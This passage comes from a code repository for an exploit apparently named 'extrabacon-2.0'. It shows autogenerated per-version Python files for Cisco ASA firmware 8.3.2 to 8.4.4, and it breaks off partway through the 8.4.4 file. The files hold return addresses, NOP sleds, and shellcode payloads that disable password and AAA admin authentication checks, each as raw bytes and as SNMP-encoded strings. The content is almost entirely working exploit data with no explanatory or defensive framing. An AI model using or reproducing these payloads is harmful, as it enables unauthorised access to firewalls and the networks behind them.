"\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x75\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x30\xdd\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.117.163.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.48.221.6.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = "\xeb\x14\xbf\x30\xdd\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x75\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.48.221.6.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.117.163.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa832.py: -------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa832" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\xdc\xcb\x45\x09" 11 | 12 | my_ret_addr_snmp = "220.203.69.9" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = "\xb8\x59\x81\x66\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x58\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.89.129.102.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.88.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\xca\x9a\x92\x09\x50\xb8\x75\xe9\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.202.154.146.9.80.184.117.233.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xd8\x01\x00\x00\x04\x01\xff\xd0" 46 | 47 | launcher_snmp = "139.132.36.216.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\xca\x9a\x92\x09\x50\xb8\x75\xe9\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.202.154.146.9.80.184.117.233.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xf5\x93\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x90\x54\x36\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.245.147.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.144.84.54.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = "\xeb\x14\xbf\x90\x54\x36\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xf5\x93\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.144.84.54.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.245.147.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 | payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x75\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x10\xde\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.117.163.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.16.222.6.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = "\xeb\x14\xbf\x10\xde\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x75\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.16.222.6.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.117.163.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa841.py: -------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa841" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\xad\x3a\x11\x09" 11 | 12 | my_ret_addr_snmp = "173.58.17.9" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = "\xb8\xa3\xa9\x7e\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x48\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.163.169.126.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.72.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\xf4\x0b\xaf\x09\x50\xb8\xc5\x1e\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.244.11.175.9.80.184.197.30.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xe0\x01\x00\x00\x04\x01\xff\xd0" 46 | 47 | launcher_snmp = "139.132.36.224.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\xf4\x0b\xaf\x09\x50\xb8\xc5\x1e\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.244.11.175.9.80.184.197.30.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x55\xed\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\xf0\xfc\x48\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.85.237.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.240.252.72.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = "\xeb\x14\xbf\xf0\xfc\x48\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x55\xed\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.240.252.72.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.85.237.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 | payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x95\xad\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x90\x38\x08\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.149.173.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.144.56.8.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = "\xeb\x14\xbf\x90\x38\x08\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x95\xad\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.144.56.8.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.149.173.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa842.py: -------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa842" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\x19\x47\x14\x09" 11 | 12 | my_ret_addr_snmp = "25.71.20.9" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = "\xb8\x43\x7b\x7a\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x48\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.67.123.122.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.72.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\xdd\x28\xbb\x09\x50\xb8\x45\x66\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.221.40.187.9.80.184.69.102.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xe0\x01\x00\x00\x04\x01\xff\xd0" 46 | 47 | launcher_snmp = "139.132.36.224.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\xdd\x28\xbb\x09\x50\xb8\x45\x66\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.221.40.187.9.80.184.69.102.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x25\xf6\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\xf0\x8f\x53\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.37.246.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.240.143.83.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = "\xeb\x14\xbf\xf0\x8f\x53\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x25\xf6\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.240.143.83.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.37.246.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 | payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xb5\xad\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\xe0\x13\x08\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.181.173.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.224.19.8.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = "\xeb\x14\xbf\xe0\x13\x08\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xb5\xad\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.224.19.8.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.181.173.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa843.py: -------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa843" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\xc8\x26\xa0\x09" 11 | 12 | my_ret_addr_snmp = "200.38.160.9" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = "\xb8\x33\x7e\x45\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x48\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.51.126.69.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.72.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\x1d\xc4\xbc\x09\x50\xb8\xe5\x60\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.29.196.188.9.80.184.229.96.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xe0\x01\x00\x00\x04\x01\xff\xd0" 46 | 47 | launcher_snmp = "139.132.36.224.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\x1d\xc4\xbc\x09\x50\xb8\xe5\x60\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.29.196.188.9.80.184.229.96.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x65\xf1\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\xd0\xcf\x54\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.101.241.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.208.207.84.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = "\xeb\x14\xbf\xd0\xcf\x54\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x65\xf1\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.208.207.84.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.101.241.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 | payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xb5\xad\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\xd0\x17\x08\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.181.173.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.208.23.8.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = "\xeb\x14\xbf\xd0\x17\x08\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xb5\xad\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.208.23.8.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.181.173.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa844.py: -------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa844" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\x6f\xc6\xa1\x09" 11 | 12 | my_ret_addr_snmp = "111.198.161.9" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = 